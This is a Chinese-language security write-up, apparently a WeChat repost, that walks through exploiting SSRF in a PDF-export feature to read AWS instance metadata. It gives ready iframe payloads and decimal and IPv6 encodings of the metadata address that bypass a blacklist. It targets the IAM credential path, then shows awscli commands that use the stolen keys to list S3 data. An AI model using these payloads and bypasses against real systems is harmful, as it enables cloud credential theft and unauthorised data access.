01
前言
通过有效利用 SSRF 漏洞,能够绕过安全协议并利用 iFrame 加载PDF 文件中的请求地址,从而造成ssrf读取AWS元数组。
用来访问云元数据的有效负载:
<iframe src=http://192.168.1.1/latest/meta-data width=500 height=500>
如图 所示,我已将有效负载注入到“ *title* ”参数中,并且它反映在响应中。
点击“*导出为PDF* ”即可生成PDF。
然而没有成功,PDF 无法加载 AWS 元数据。
AWS 元数据 IP 地址 似乎已被列入黑名单。
02
尝试绕过
##AWS SSRF 绕过:
转换后的十进制IP : http://2852039166/latest/meta-data/ IPV6 压缩: http://[::ffff:a9fe:a9fe]/latest/meta-data/
像这样制作有效负载:
<iframe src=http://2852039166/latest/meta-data width=500 height=500> <iframe src=http://2852039166/latest/user-data/iam/security-credentials/[ROLE NAME] width=500 height=500> <iframe src=http://2852039166/latest/dynamic/instance-identity/document width=500 height=500>
将有效负载注入到“ *title* ”参数中,并且它反映在响应中。
应用程序成功加载并呈现导出的 PDF 文件 AWS 中的“*最新/元数据”信息。*
应用程序成功加载并呈现导出的 PDF 文件 AWS 中的“ *latest/user-data/iam/security-credentials/[ROLE NAME]”信息。*
应用程序成功加载并呈现导出的 PDF 文件 AWS 中的“ *latest/dynamic/instance-identity/document”信息。*
03
配置 AWS 命令行界面
打开终端并安装“ *awscli* ”并导出数据。
打开终端: ~# apt install awscli ~# export AWS_ACCESS_KEY_ID=AccessKeyId ~# export AWS_SECRET_ACCESS_KEY=SecretAccessKey ~# export AWS_DEFAULT_REGION=region ~# export AWS_SESSION_TOKEN=Token
~# aws sts get-caller-identity
读取 [S3 Bucket]。
读取 S3 存储桶的内容。
免责声明:
原文始发于微信公众号(虫洞小窝):利用 SSRF 漏洞获取对 AWS 数据的未经授权的访问
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论